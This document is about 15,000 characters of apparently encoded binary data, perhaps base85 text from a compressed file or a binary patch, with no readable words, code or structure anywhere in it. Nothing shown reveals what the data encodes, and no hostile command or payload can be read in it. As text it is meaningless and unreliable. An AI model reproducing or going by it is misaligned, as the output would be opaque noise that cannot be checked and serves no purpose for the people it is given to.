z_yvz}Z~}Y(d$udRFK!;jC&bqk++y)}K&{SH7FNEI%Qc;ltW)+XS#8Fi7JarS$sp2B zX-Y@UThf=Z;@|BdF@;_v%u{U6H4&>VDfT;IvhT)Y(3R-UP%UCbG`Dvrw;|YX*LPty zks$C1qoXM%9BGsO@G09if&J-{k%kh#o|k4ziBX(F2cxjoy_oyGap8S6Y?C#Zb_)%Q z99>l)=Kyf1HAmwT-D)=#}}})?+9kQP=mecKO%hzbYd- zdn2Ub@1u_AN}|G~J7OKzS&;L=kf_RyXiE1{Uz?N*x%EdL?IG}VZ%gdyFTg%G+K)@dQmE1 ztBrSShRHlQawaUSsXqM12E;`)M!XVd=&dAzy>|P8(#d?ZWO#Vl55(03pOtKx);uT0 zUP9H)6KWf~eMMdxDK=3VZH0|Oa0ab)dds0N8_=1AV$hnh6R=`Y1W zV#sE_aeA6$M>-i65@#Jww!|XLHRIoYi1$2>H{Fi&Kqgqyxi)yDn;3JPc!!kul*X+}ic505S$?XF$eh*tBqmf3!M@y-OwZ9q ziSh?!2i;RcM14;xbL6ZJM+8-=XXbfs9O}K7Iu~Qa(?AIfi@q5C82^Bt^Z;vIb)2+d ze4!&;zOOe06q3|WN`CH`4CY8F>`e*cOrD~rz91p!;mHHNsY9@|iR08c$JDy;)ThWm z+Hoo^JZ=3L+KWwJK&CA7NrJo(g{h)9SO5OSuo&m~oyiZj}n{XS7AzNmcpl|W3TXnK1Fvl8?cT81f0QQSS`4>oM75(?+X)*({YfQ9!IK|5ygLk1Jk@Njf;<`T@_?)0<(rGa#cjb9pg^V|Q>%1;`aGT*862 zweb;96O!Baxv!}AM~V9;qZBh9%;qj{%g=>9%64hgv27Q+e}?hoe?Joj$%3yB zT4W=@nn%!*_8a$YkVS4HG93V6Jj5^r1e=u-8GyCp;3Y~-dBE(;PWQam5$>~h5wlQf z8{}m~ra>i0IU3bWLWqSjs3Djjc!no9#EYvMb4u12IuCNQ>w{v5R(}4Pk%9MT5zpn@jeJ!B`XHxFmg@6DE++Rv zSI=^zcBpr-L3p(y#zTnVhEjh-xnAXi&jbY2l;_9^ffp-2?lWP3k}YXh5yHXAyDof% zqjFlZ81wC}n@=UfI%2px(;%jT?THeLld{xkrCt{_utLud09AFaR{b9URzRu0N}}$ zDoRs|6g-j!=&)9XdZ>hheQtnuu>XW{2tfuSK_Cl3LV{4K0wD;O`UjO-s0D$km?}VU zzy_G=D4aSte^98XnyRY0s;t_otZJzO~O!Ke@61-m1w_UEaKLaPG-C)Ubi2(e1#hY%HDt)-f+ zZGaAf&@6s{s??)+Ur;G;K$WJdmjrIE_62ZG?HX_}_!u&#g5tpX7Sy@aI6 zDnOemtK`ZMg^;WygaN7-W2s6(Y+4Y6qdB+QO9VS9B$QUAiVlH5umS<4AI1l@+DnI$ z2GUA6Tu?0|G!SRtsUmSgqyOrc13?Db`VcOlOL)Pr2*Iv9D-b%HL>Q~741uqwnyI>k zslDX1ow~G9iwfV1kpy#T00=d=1^@9KZZHNTftLbd06hz_%37+=db^W)Ewt*Wnu@*HTdDSIsh(QD z_lv)p`mBVrzj@0LE6^-_K(YhDAZ+Tt{R_ZIYrp!tzYXlb|2wK|N&yB@T$DP&4}8B7 zEWw(J2BM0xd$T07viw1b`3)@Bs)>!~;IH!{3Xyng5!=(@FJs%4iL}+6d=90@WulX1bgfq z10g`@IuI7H0uAsGpDYk4>$eM0#ZO#82jE5lz{8o8Iu0-afBXmYED#Vt5Rf`N@+$-i zLM#tpBNI>`OAOBgu>>@#OJVWKBaxMl3aKxE%{Yp(9?$^N%c(fK0T*xt77P@q`vB-n z5bOa>?f=XWT9LgZgbp+NuU`NqQo96IlC`=Nt_e*L4&VSz9KBWK#z$>H!3+@(00%MR z(>*-LHJ!Aoix9)h%ml%=*qg)!VIC(Gra?Nl0L;Kh>&&uTue#*bvpNt{Pyov}2+vxz z?yJ^ojn^!d0_Gc*k|z)`LIE#(sg(Lw@2n(x?8AWkuMoi?V=_2;EwdgWmk{x=2tfkg zdnzK(mk=v!uRC7cOAuTz(*@ze4s~|HsVP2v1n!FvfJ?hy%EEtO0Sq7op+Eqr+mue+ z&q+(LV2}c$YS*uewUg|%f`9}IKmt?X*DtZW1T6&&QVZxz);qz>fW)4k-@ejpjHthx%k)kq80#vIFK zYdn2Zxou!XghMzR`{7f|t^(n!Y!$gA6snk-UuQ)dKUA z-ntIfy%gl?TEMmn*)HDfocgtDwYQl{q;lI!km?7r>f)6{$?m({gR|)hd#bh^zd3!W zgAT0^0k^k1==SUfUOlR*v$KSArmQ}&YK0DlF5qnKsB0jr2_EFMTI!d&=_;<^2R|wF z`o_A{OYy$9X<)zdex_qEv{1_jXsgiS{NWH=z@3ewRDP*y5Y8h168Sr;g#WY9WzDpx zO3I^Zz$u%u8_%i#+q4p{)u&1Z5|6ay?x#{)sMql4>-yF89`o*gsZ9^{=$f|#JK*@r zuXc{9Ixo2Ro6}hj-&7CsnZC5$Dy#UK_G-WOYfsqd%C~~h^a3B}D}K958@Kgps_JU$ zf5X4$y0lvRw&)N;9j>W8f8O&O_efEDs;27m5vj;;*S_FA$31v{_F2n`-y$%kktN_V3*G^B?~8ALf;+^PUP2g8mHrgYJ(YbOsL| zRESRCK|cuvJ`_~(4;q3Q31URJkYL1t0?9lasF2{AJ90`643v@NLO%;TqPZieO-43+ z3KoP@P@uyJnkc)P4to z3G3Qy<&_1m`Jq_Rd2#2@4>pe;(ym1$Bv=m=>QVIEfh`8I*(q0J+{Gm+Mg&ToBEzpJ zh_8J4vnqU_A=#szP7+O#KajWyFr~E8sD?QH_~48C-au!*jI#K{3!PTm2pu*I(`dda z2J#}K#Blfnj4p~>D6t#XxM3hHFwlrW<4WpDt~Wx%B8D)K3#}=zO8Dc77{QZ@wbnFh zA|pP?bB%}&hlqnP9!9og?{<{VzThl`2}=V0cp;-1?o#Niu|WF@(y!*o$bo^77~m@hc{D(v30yeQt0*nV zD2ONnL8z=4N7CqsLkKz{iO~GmU^O5f_zDy)2!bPrKkWP?i0KG=!44w`DhEV#3HqQ2 z556$tR5LTW6`gBhQ^>rS2HIl+f>QmX1Oq;N^WQ%HsBOH^%-eHKHTJ|v1SAYjEnkfm z`6G!1{+L1~CF}?-*VNGQaiE6z1aZrI4;phIBNF&hNjJuL`41HcI)Gm{G7@&rfkX&n zz@FNCsJD!S3wNNAgBHXDGRPooHIy3#H8j6?6#s}~LGmy)XIvl5sAP2c3sUT{J0(a- z3b^Chh%G>``TL2cwa2pk9E03{6M2+OOP1Uz)5fq;-lhct*z7(fuP8N^V# zV-&3h@;OUHVOrh_*&i~-wGDJYQ3LTG&%*Vas#GK@Z~z}mpyjB6h%X~l(1`P}IFLkq z%^-)=450>MNt&gG1O;HhA42g5FaLe1KMYX}2A@;F^~CK#up$Tqv^kX^vFa(VT48ni z?3B#nRx& zj4Z%^6iAy!;8oJ`t&SigAsrl4P`wXet}QW|$P6_El&hE_F%JQ2RgeXi1OY2uqrs3# z?xj!bRD>uAVx|JYl9JDyk^ek$_>6Lx^QwWJC$pNh&zKCthB$O^A@74*SO#Xp``|Ea zMHz!!1QLgdWGH3csm};)i@%Vdqby}%LvI_ZE%n&uujmNOpMDFSKh&rxpCyR@0@I#+ zsl_mG%uq)9wknyRp({nK5E=y`htM8nD23Tn1NCH^F@=_4f{Rpi7ZMSDU`tG1-rj+{j!Xh@8DNYcrjfR;Q6(a->!vd_dOcxs+8t#2Fzh68@H zgb+Dlj&t0eAs_IBaR2!Uaom~9y7p7bQ>Jo7&Tti@%=U~_qVhYZY}grnH(@QF8{Jym zDTnCfA)PT~LJ;F-__l8|J&~DZ?&FYzEJYxaVGfOb;)3)YXwpAP2xv3toHJ|IQG(!#Rs5j8y2Qmg zvL@_-DSgkloy8$(NTV&^b7LMKa5bBHiD&(sk-+Km&EhF}wM!~FcEW#r{*`-F&CD6@Pb6Qbd@KI>Kt-tR~ z!L+0EKFtY9cweQgkgeg+U@-{Ml)hi@ECr3@5yU+G?SX6A#@l;E5dR^A- zCd+tF`TwNux434ji5&>IEGQf>)GQjdm(#1<$nno{JU6ege-a2wQi~hN zo0>xh*y@SLh>~*wrKDgGAqb5IBr$X%ry^+rq2Qq8V5N*OCPN|!F>nopGLeRPljrk2 z3)zF?QjNK5ji=ZTkC4A9V+cSo2pB}6cM896B0eHBpy^nl{-e7pQMX8uo9WYtnn8yz zIKc)hv(WGs5}1~ZK^m{1sS~j)Ea9q*paE^-gVnhPu=xY7Il>x>JJrGx>Bx((37|A- zHvhCMw=)E{1#1e_xqvK`I#r_^>x;CnD1ap3DzC7g<#CNJDWZ&E3lD*p)zQ202?Gb< z7JoS)Od`b8cmX%y8bpAmKPZ4~(TKkqh%q#)fye+Zhyrl|#f4aeO3)4m04j~(f|eQx zIZ7Davn8=OJGg^G4B95XOQB|)pitp9xzo9#C=$D{#nLJ<63Pf@GC)1hmtNBdH~6o$ z(L_5@2$-T0jA%hj3q^!eF@gw$YY+rvQL!O3A@BQ?`I8C6f;U8TCO!$Rr~*c+F~eO< z!zcTLGav{DC>OBHEX9Kkt$Q+i`h#kEuUT@D9l}M8XfV2(D}rF9Um$~+IGBnU5dQ`` z!O&Qdr@6mb;VEQ9q)>=J4G_aI_^%XL6Ohyng~=oLiV?ZGLvTXJ_)|wFW5;%Eh~;=O zfs{dI%)zJdCM=|gH*`Yxb2@l?5hNLkhxjCdAe}*sku@R%#L2>Cths?W$TRr^0mulU z7yvtp7X14;sXNCWtV#d7$<+&ueIyhzXg^ZBr6jvSBg;YhdyexWhznqYHz0~$L$csH z%NVptT+#?ifvBc%N`ffJ^8f>&BA$o91r{jD&|sz$XaGep0ZW>K?7@I8m@jn5OXG0L zB+7`{*@BFC08I>yNhF9!au)0IMvYj3LUN5YxfK%$0vHK`8_O+YMRXyLNa_$5X$qY>oj=fl2+)G| zV-eqA6uFs?LMu=8u_8F&NEM&}9QY^0LbBQVH>okVsvxb5$hUN{0Ov6y=S;`6#HE=- zHKn))BPfjR9E$lY0)^Aglfh0hbUi}Sx4!TWgCLeTQ;0U8jOeq9g+vzteF)(&MdTuh zHAy4XBnVTyjf|KALt!1`BRGv2h}qEz6zEF~01y{(4J(q+Kd6C>z$Da^8MPV+0ktK+ z0FJ`k5rCW;g~>S{G{&Bb!Q!+>VN6ck^F?oy8w@2N5Gp(`v10q6QZlpDr^#B1J-I7PW1)1Lp57XY(CiPcGKj*+imVU_FnCq$8&ihp zE_yKt;Q$JghzNb%Pd?N`s0o>-h|*jtqj2d};(ClLt@Q~xY|3F7Ll92kTt@Bt%T z%Xmu|E0xxjo2|G=h$!{JUtG^(&5uXbQN`-FNy`!jwZZY&yU@s2Edhzw8pl18wQUj% zqO3sLD+x`?)Ff&TsZ&3nGYL1{pFi=`&C3 zd6Rz94~!cMzkJldTrgoH2oTCA9DCGkJJ^H?3Bd}N_w2nql()TIl=4zL$RH2pB2y~$ zx{>X@D9Jg>OFA^lfuzuc6YX1(t=KF)IA^P?zeTsZf}cTyTRAYS#;pjQFbuzd9xcJV zMlvjn&7h7m++}sW=K(9hrJ>mZ$BqEV7ON1|O&P<2z5h9M3E848yhv9maY6gATCs3K z>Ku=EHBv{zQfE>|CQG%4P#cAzyqIWG0RokuxQX1A({VId-$1o>TE}~OIk$UT&Sk-E zOCh)z(Up+XyPz>akeSJVF&1QAt*y=xVwHF_q&v9JftUg(D7`lvAr{KiaPbRF89An~ z2n9sc<*f^|v9p7H2{HPt7i$QIB8ns-p{F<`ab-aXbJ)eD(efH0q0OYE>l8HdgT2t7 zz?`6mK%@O4u9zTEv@nP;7z=dq0*Rni8G@hBIy94`j4&_=$=r)EG>e2R)z>C69XzgC-=o*%MjCFiL415C65$2?}sB=;=pp(UHILl%v^0Z+i$< zf;bl~Tvfw4irrl3v5O*!pWNzIdMrb#MZpOn2+S-33f+T1sDc#ekmdSgpAgnl!2p*5 zBs8>6n==jrcu+;=8HKU4W4zi!^(dvto`E=kzG>X{Vy0+Rh#dfs7hsSqaN>n|2|4vb zqlt}wYNM|pfLNpwLpB-m`hzdfAIIQ5o~<0fpbFb4%^0Z=;YcGL9e^t^Wprsv<14=5 z_yd0dP%s_3djSCg?F1JR4*NA5IoSz5=zu`dh--*~@kCaJ3{?~Q(l8!(foLro`umCmZ~@$810$G6?1~ZFF(>k{Bu%`cA(e`aGv`Yd z#wTi^JyE?=w%f}6+ZM~q1A2q5J}1Rii%%;LK;=6;J2N{@UmjVu)Odg|$mk@90?1Xf zzcs=`PK_k+kv-_1KN!G=kdu;sy~Q=Cj4eBZA~N)h195k6p-gX(1VViB<+TtE7<{4*fwbv z+4)%%PY{43upL1_D{%4QKWG3CsDP|~X{+AR4JZQ5`3ebhLxJd?)xib#{R3eNYs%$0 z%Wbh2#4J4t0y!W7ZYcl+AOhL^3MRl=dF@}*F6gzRVaV11Jpf@gC;|cBukjs5*5fuF z+3!065a5at@^}m}jK+b`g8u_>8T(6(+`s_J%!pWYQ;S)F6_`bhcpLY2f{VTZQ-me~ zs7=!GO%0HMD?k9=v+-G?8#8y2+?dCKFvWuO?d=QjM1OPu50#=I+dt?V-*kvF0I>;vL$qtQYv`~U@9_V>-mRXZ%4FchyP>oOm zEm4!upe}-#BryMq*Q9J`m$@BZl(+S=Z!vOcIr2wuFyXiY2qkM8p_jCdoz&C9uOi02V)` z;IGJ*Y~oj?=q-T=g8%Np3J@V3l{h+W`xf==#ITTqjBaj@va$PVFOOC_g3tnH$_Ost z}!>_z)GN(Ts?BHem3re8^A!wS1W; z#p;QAJsU5k`7t}?S^i($`$sxmU3T@)cxm7MRFVPlGp8kwHR-F$^V>$@afqPO;KK<$ zn~J7;J$}BQvp0-AeKjrx+J6*LQZ0ziyIbB>x+yL+FjnKM(9xUtrz}Wv89wDKu5rL1 z^IZBYa{IZDEjv?nEaAZCuJT$&xj67TlMX#!!kbe3Xt>l!dA=>)g9SW?ABX`Fd!0D2 zGXjoDBjSSSxBr|dHLEKK6|*OZ@^=4o6nEvb?fANTn~KLjtlGbq9;Vllb ztBNN92tn8W2>N5tARIP+&=1g9lkw6q(Z_8;>VL{t1flqaTreTq@Klvdteq8wvX1GmsBS zHa>L*^~i^fps<3l!qgddp~0MKlcr6Jj;zzRJ=2zq!zZjrlLdvg`FXNv+`wv`YBhTe z=FGn+GymrO!-pZtYkcG^#u!#;!ODRRVkL>!^5ut@0lPiO7PM24f)*w&$W}G$n+%&) z6sndXy1wZAphS5R?9qdT3p@RZ5qMlSoi`&i`9}`(=sJz}77o`S^gj+w%6Z&a zZ&qI^QfpF)5OrGJ`n{)CiOj=KZ(Dir=jk_9Y9@)B?nheXH`PtV)dyBsw2>4QIxNNE zTzQ$fwVY=h}W88RjAVx4}xi5OK5e;Wp!{CgrHbs8pK5yt4aCSV_blN z&|tEOGz4JAIq8^Ahj9TF6N&~^7*tNJXBLPD9ig8{pDtO^ePvPwlWaNZnAb&uVn=3* z0;SkkPK8a`=|K_=HrGc;C3a&{#tn8F5hR>irHM;I_p441jK`W{l%Ho?fV-q@mG$?LTK5XMElMYB^y{?;K_%y#eM%Tz zz}PbB6bhs@D%@rXKPkZjtkrWQk3BpBNTLAs@XHYvOw7EHD zA(yEO7Kjc6Fr511uuELZs6j7dB!xi|L@~w}2JNARcEw4(nY(|iklnh)t&5v&2G#J# z0m7jJ%PB=UU{DN$z7QAI97%VQAYMR>PTUnnfo`{}Cg(SErxCSdWrYcHgt9*urEj-P zN?evV(eZR6b9_W_01-@ZY|t15!EnbxQ*i!AB7m{b zT)A~05K|rCgvbVw;QxV6QK*1$ zv<^bCJA9x8OR`;H+$8|_6)ImjNkGFk)4q10gMXVDgaMf|yynQSgYnZ)PV#n?uy`jh z%1X-~P)0GQtnd#QV2*&|1QL(%jZ%NG!v)9?l*6Fog`y!}Ui^@hJ+Ub>5+WkOjOZpo zXaNOpc+5>ourq;7XCQ331LeS!M8+IZh6ZyJjyNZ%vG7nxeEQ-M8Iut{K<^K2Y(QKd z;2pM|? z&}2H05=Y8X5wx7f0;Bpv7{SpFvWNIxYcN~;!}BPx zs26$wO$V`{S>keo4?N%xoczQ89?7VIB<30(;^IL}l>s~a0hRrWnL!RSpJ00NL}@gl z4F3RuKTPuvqtpo!KBWjxnT0hdI^!Aj;wOyCDL+UsWPR{Lxq_nRpzzWOBM)K$!x^Ll zVK7J*R$ve}l*b~=`KUoG)-KEKNT$d{(75MZZkMrb7 z1G=KZNWhe7so_CzdJs<@L zCJ8xCRNBA?iHIm6OYsP1Q^V1QkjKF9nGM8XoG~qS37=ieB8MOYl&MH)y?HrlhAukf zjzR{ZTh{1`#8pD@kW`5#9chNa;~|PnDL4(G77$mI7y0}l4t}7Fc81s)h8< zdd##^BnOBH>J7Y+^VrC&5Q@aGGV<}Vj@h8&`H4j>g`7)B#sWebHdlMLbTn!~=bV;& zN_0r#R(v@E;a)Q@v^=5~OSr_8BfiKY*`6*%eE+1}7!MR^Gb|QFtU{%O-K8wA=A-If zR~jL^$UsBoBLG8Jn;{wz+N%SOjz!9$&f#lFTtUwbjXp@dg#`IS|Y(wBiOOwy29^ox(w97mBm$*>Yiu@NZm zohMlkZG?%3Y@V)JiKOB^ce6!mX0Ny}-Q0fTcySO-yub+kJH&<4ndB0t%akRJ2YHN3 z{B+`0$=7L!$$L_&Vie?-MB^cU?oA4;FaInr>CTIH`7PBZX*WWW=ZujIr#HCqSUc=? zFM?9dL{u5kUF%kLxBG8Rmh50zyx5M3Ewwg-;e#~nY^qz4N3QA-nR2Q#11mCD6U=n= zgQc4o!71(<^Fe6B+sIZ$7)W+8$YQ*n{83b6WC2uofp-DW%XCI-^+n%#OA8Q1>@y`)?4^%TX8VGLDmhTk!T-yq701i?NKaq}XndKPnAw(PM$_n(g#?Gt)C}0& zU<{U-lYs`5ZN>!fnCb9~5*3U=eF?MZL?jpiR3r=mxV z5X>ot#@n@FMo|Quz+vURVyz?*pS&O%XGz_Wz8Abqr4OHSmh>%Wg zhEL5Nw6p;mm_V;6$n6jeqsSolsUY3WV3_R4!aR)DS>iW_VgY{DwmgY7($>A4W19T| z3dqzotWUWq8)5vx@*LJ5O#i^mSeQJilpcf(2U#0NC;%XWQ#<)l82*7492MUDK@!j- z8MF}FO@TiRKms^mPblIav_KXtz!Vrs1{}l-8HD*XluDTe7o5-p2&7KPz(TP{-)UTO zs9(p8PzkQ08X;6VjYdcL88t=>?$k!`ec#XgiV%Z&UAqbbzx1SAUMLFBl=!@4AD^jos0RTf7qlTtiYla4ny4?X~AP$ z;MMvR;ftvzY&ykXqJ#>N0T6}(1PH(<_8RboV_eXlxg5X>TqQazfYtm#5meS|W#cu@ z2X`u2oxRf^xK-7;NbkiaS+?IF921fxMd4Tt8Egh+PFYhNjAH$P0sO%f5l0Y=$t7Kt zetOG6^p;?R#C~nfT%M;+@zftY0WEZo5Ey_F&`nDgTub!;?_5FC48bfJ#CwL?4qgNV z6b?=`WdC5nQelO)?A`hiUT1K#ZWE8u0fooAy|4~#ACGE>b#py42-7PNt3un zRY-|2QO;xV1emJm6HS;6aY|8?P(eVPlxhcZ#ou|9g&eTNNu&o%ycK60N2ZdgRaj+b zU|m7@RlZ@;jl!FZ(&Yl`8)?Sqz6@92^oNZ|$e1PGeOQEujE-$AMW~HPBgPmK;mTHY zQM-u+pv)rhvF4gmmr?9mQEWaM<~Fcw_CfP@9QVq5%SeX8GNQcy3pQuVn z+=YydhKQkQi`r@lp4hLY4XzMglJOfFnMuECDYXt1wYf-(=!ePzSGaa3HI+pOVxwPt zL=B$USL8`pP~WFc8nGtLVr&{wTqV-tEQxUx&Qe=uSS)_LByn{jAHCjU2r8DQ3jFEm zZV>6;VM}uo&s5#ZUvy1q{i;}U?23(S_w5ODz2=r&TWOt`vgQ-0Nndk42yJ+WmDsfS#D0z)vpe1UixFo4VoE`mavv zZvBP}Ef!H3CawPV?&htq9P4fy2IppoUMP~s3gM6W#Kb{hLI1Hp3mAcTF_#LeQBI6Z zk@^Qp3}k8~OvpZ)dV-xyRTh7mF1C2%j@IZ{-Kc~b1plbR=;52jzSivAL{){FQ-s0` zb*Sa)Km_zpKCRRhd|L3(vWo@=dp65K+_FyWk0i!L0K7tTA@ZaA*w`PaG)0aPHoR>7d4p@C=pzFE#tkECtE6R zaI`@Ye1M5=#s#6b@gINy3mo(mPXQ$}KqTbFQwEWcb(Bm-T3~co z`*~P!4(^f6?oIj{ND3d7k&H}UvaaIDbs9u|9z-%q#9C+c>gohBAOC~^wB+|qS_b`d z+vr3Lj6gCunobvW^B_LE{TD}Kmpv0LA2z& zkd9CFv_GY?L0CWpQL{*RKzwc^I%m`x-(nrVabL&r7U}W-rjd4o3JVXg4&Q2NiZWFo zs%{ztfeMg8B%RT$R2xv8PZkRs!~g_5CUfM?Hr0ti%&^PmN~{|8H2N07P)tsQ=%8al+e94rM|Ohr(*Oxpa3mm(K&)F1^ygzXM0i)@Akbn3eHh_Ak)8(zDaxiI|> z9RH5@c+c^7e@S@%B%-})WVmsY9N6;)$CH487cY^tY5xXvdInM4gsJ3}hg5rwk@vSx zy2k0o*Vwya){J>?c=m~q(nWE?3@fleZlgaPy zQk$0O9YWiUkSM$BBK|8$|r>8`peKiZ`EZ zJq}OlPss6D9gAYPv*LA>mvPa`c^PS$#!$RTp-ViU7`ha9&fLODM*s)bHP@?!+u?q% zg?tyW+Xv46?vJ9el{_Cv3~xvz1)ufVlP<(X?EgvNOn8?dFm3+?=%?#u-Uh_toRF9! zmcTu?bFq!08Ddl(ce#b_u!S?mE|3s~qYtdQ3Rk7IG{%6%SD?pYFo_%d3j)g*)~4r) zJotsh{(B%C&oO@ochDGSkq9z`G^;7b{_-fVGdMzQUd18lqhn|_HgsUvXoSRitg66j zGrmwsH*p`Lit5m9MB#g?k2%NC0>mFdfBvu$G>~Azgm4rR0bvHxMjj0Pz}6vPG&!m3Kcw#AC`;L5f;Qj4Iuw2XTnp>7??<*u2@7Qj(P~_yY=RbO8)XdSkqrSC zUaR@ERnw;B5?(s8^4ubS)I=w^d8isO$sRzgdHu*g8}yS5sTZ~rcqc1q2s=2-I!Bp;)yYB0?}It{gmR67eHA|BY! zNbE4X4K=l%+^sbv3)^Tdzb=^VvHxI8EGUjF%ZaN$GDygUgo5~Ei1G+hU`{8^lZ&wd z3EBY0x%m2Hg-wLmk03T2Lt=r8Pz>t?3*;an0y0iuK_M@^a517c2x4JU1HAY{hr2{; zREs|#Xh?x3bZX)c816`@&Vi@S&*!ho=95{)3N80ZTk zE*emQjJc-kuMap#AU3K$wy=+&Jr~oA%V7F z_+#DmcD;-$!oZ4(S%NV5^8dtOv4ZF=hIeWhB$UOERaL? zXs+1WV&aXU(j@s&iRXH7Uo!O|D2qSrWody88sdV4`wDIg#{}*p=nIVpOol5ixb1;3sph|>X|c(Wnxh*a+nadEOp*Cd80009;L z(77Q8-h@Hvu!?1i*M)>6h=~;Zav-4!!b;Us#YP4i5oID0BUVW zhIaiB>6(21xZ#6_7Q29;RsRV4h(Ack!MlVIx9X#Sbssz|GXLmWp(faP17I&Td(t%| zlUH7OwWDKUwnpdD{Qr+EL^9Xqwwl5XH{HAMvMmk%c;hOGAM`#;^p8&{*@V2vw+T$w z{hA2$e6NTzi?E>HlL#;nzabD1!Uh6>m%ET4c7L#dVHko1zpQ{D%4taL8gc^G5rl$& zFx|OM@P`^Gq!R{9;KLhosF&;pN9PZ-7hGe24?NLGPbhW^dFwSNefWUn`fUAxn4@qpWLyX*Y z4f3=lP}llHuNs1cYpehX?>Sdc_V>2)F>fg{>dzI_7M3Vf=Z<*%-fNDRJ}@RmA1vhh5GatEiC3+2}#OJ{%{4f`Q+x~C@ zo#X^LEBZqf{t$%}FfvARKu58bkdSLk!I=takAa{f2$cDOg>75`7}jI4bAf~leRPOG zzDAH|6`-66f#9eZQyez1F_UD>)9|+97!?dbjtQaO5~%QpDLA1_1aV+wK$DORVhki@ zDVM_9@*Z<(WGHu#LmQYlhJql(N9f>#9calXdBJ0XUHrS z^{7ULi2u>bgO0ac3_xE=5h$rj)j@ubj3r~4_5`Wav-}Hxlv&b198{8|xa22(C@aTg z+OhYPq$6P%12KI9C1Sb+Bsgt}MZua8QzeRID{)L5+5i$bz(glEVN;m~5-7luL`Xhr z4N%^b7UR68NHsj-Xe3$~I~*mW9QtA=%_>QR7zan!V8}Is0wbTeL~RHOrjyiCopWJU za~;_y+mJb0omeE0x|_;Co{ABoo&_+170OCtxfMT1Mkr_n(^}w)S?h3)tR=xnEOo1z zkpvfE;7ts0RfJi)Y_CX8wG3oGB*_ScrX^b;*flx3UMJb*FZlgZUBfEbNQOl)auKh6 zHUEMT1XTsDI0BPNF1tOi+14gZvP&4`ix!s9H!i5XZb9I%OG$D^5NAwLT})zDv@WHz z`7@?NuHx5GcXI>%mmERWRsUtzDez`(l?jaV+8N=1UIyN|>>ak6xb&yB= z+7Z#_L`%GDOkCi~7AE@^|{EQ+oIiTeyu5}U5kR#YnH77n9qgI z=|Kwnmum#L&utMIrZZv}zp{Z3C{gc{-V+pt9ON)r0a*7iX%&_*q|+O-$@UQ3RR2WQ z5<^x&a;OP&A6Yu?s8_9*+nc)9um}%&=|$C9f@&C0uoQLSG`C2vQSD! zpM;Dd+e*45+x~_(6mKa>35xU*#s@iwAY{7!gW-4>J2m!b+KYw88UfJh|70tsYyNjRowr!N*oIZ>NM1aJg7c$Z_9fL=Zqz&`(|!hFw8SX}!fot;0RM+zRq*Td;BS!F zZ>$PSpZ*{TB!&%g=5HQ`AlgL==FSJ-Z9v*%R%}8bq99*>rdD789p=Na-k<^qZ!Uab z0g}KE5+F`KE-X^O5H2WK`XdaEFd;+?Czxs=4qz^U20IH=IM?wMe!$0~& zMEdU<)oJm>19Kc>3t`{}NW&sVU_1z70$zX-6JluoAWp*1yW&kqY7uL~P#@>;KQ1u- zRxb~2k*n%1ENssQ8)md_Cn35B3BM{KTt^`&@(%_@fuov%R4FBNu`eP(j z(I+HvyyPX^;4Kj$f(1g-7{lV*`~$&K17dCwAyEWOpaL>h3E)(2-EtB5giwLH#rV9) zAugt(6hI-8AOjXi61^xWI^hAluOTcT2ZFGAYQpFSL}zLyEC7HY`erWN0M)_*BIiPg zZe<(E03x=LPCNmj7Jvf0fT?&VOmbo$#ZMPm@*e?l2LJWY6+^Dg?gG?c@vkPyyT}6x z9MDdFFTzNIFZcj>&c!&mCX%q{<%EQpl7J$z03C8LDw3d_@bTr2XZ>Vu{Z8`@*dPlk z^9|PN8GRxOt|9v*#zU^DOXBb{=1?U#4tu`q#*odwSZ_5?lQ1;rAt2%=OoSlTi8S7T zD?8;fS;`~k!wAgiD8od)G^*OpsM?|c6)VCB%Bk1JhayC*VW_7eu+RuJ@(&&ng97Ra zMS?uIAa2TSxL_dMAhNyIhDIhI)j~T$k=#6NK44-#IIw&Qq9#-^M*sfvK`?9qkAmI;B@^|tBRmBqOwZ4- z$Mz1hVA`Z6!sH2eDgk%m+w_tzhmyZUEhV(W4YUKbs0SZeZeTt#r|^du+b$_ma?8}B zHE{&SCS%MlNsSMWC zoU(wkYra@B?PPz~`xrBk`{deylJ%kE4;zhsd-JYzrT!%)pB2MTDuaFzOKDeaYY%M> zGMz5VOPPq#HB~n1Kv6}1(9mouI>9$AUtuF5)h2fb@2&C8 z>U(|-`(Czs3D@eEa32rubsq2BiMVa z*)msOo43vcI>pf(t`oxiQEfxaq2{^ejE<6{!BwVBL4$Ky`<~n=>!Nhozw9P6-zB=6 z#PMEH#tAwv=h}sFS2ZObYXwUO-6xoWM*&>eVmj+^dQeNk#c@?kY@^KTfyquk>#b^| zbE1{~R&t<@`)EpZPx60Fs7p36hOjAfsz1mxx_S;+T zDk7`uCZFG?uXKEmqJYw^O>cSIuU!E;#cN9~6?OK?ZjJlUr?90@zav|_W#B&;knr_y z3}NdT{mG(Z3TC5LTpUkqIv#jHiQ4cB7=0pJr+4C6<>MwdoYM@8!Ws6W(6u3Q39wG!2W(xJ_wBv^kBwAwMD6D*5e{W z?_gF5hTh&(FJA5ZZ4R9Qwv%-X^qDNT_oXxZ3K2amcnO5~N2=XSy}n`;s8b6}OOh18 zqTcKK-wtetETfPV7SJ+{XIepT{*txAxhR!#?PEjcC*_y;95Edqqd)*-0wD39MzREb zI-_U(OjhfP3=}TdQ#thOFQ0LiL~Lg;7#Im3<&4YU(voE=s~4Z% zr~C-e`=#>7N5M}SzAng$p~Zun3v}jMNF+=DOQlj7fOB5!9DW;anTh9k9*dzHN?xO7 z@VPQ2!{5V`IC?7x->~&u{n|m|9OwbePzIWzSMPbNtRSI;b@I|86f_55Rb*g&q3`m2 zMM3wZ=VMd7OXq^j`10D^>E@HLv&y8-zp513{KxmMUI}ZJ<*tXS(b=-%6TS6A>j4pe zLxb;baIgbxg$bbMH$XtZ%`r7o)XFuRSK*T-AV`I*Pr%KDLdaf;oSd9YeuPeweA-_Y zXPzwibCjvby?U+ymPrjZm_GGyZ=}mReAry`=m4$7K!P13^D>4>@STMA^OKYB9KrxC zJtIs|0-C!5*gb{47+)*U4?XOa73lxRcD4=jWN@R)kL9AD?EZU{Nd8_GqHAKQR&fIB zZ?E0sK=pPxo55|C(mZ3bwj8fE7T*iK>Tz&<>6d1o<8O!0??kLcku$4ahNj=VekhIZ z#;$>SMOLZ??%1;6*!wG3&K@+Hau~3dnZd1`tnvTg(l1>u|31}4uwyLs`YHyFh9hH6 zg*12jgzU?i3RT?#jqWvLEp?=oR`^lr9QN`~gtr_v-GMPXdTcA=QG#Np07MhK^ONhT6he*~pS#O>*X#2^Z>zR3@va5=tn~dE8UjkNV8l69< zQ8L*3y1>axQv}C*c6svlca9qWVX0UwKEy%!_AJK=dfe>WNb#tYTKD(|9qh+;1yKXN 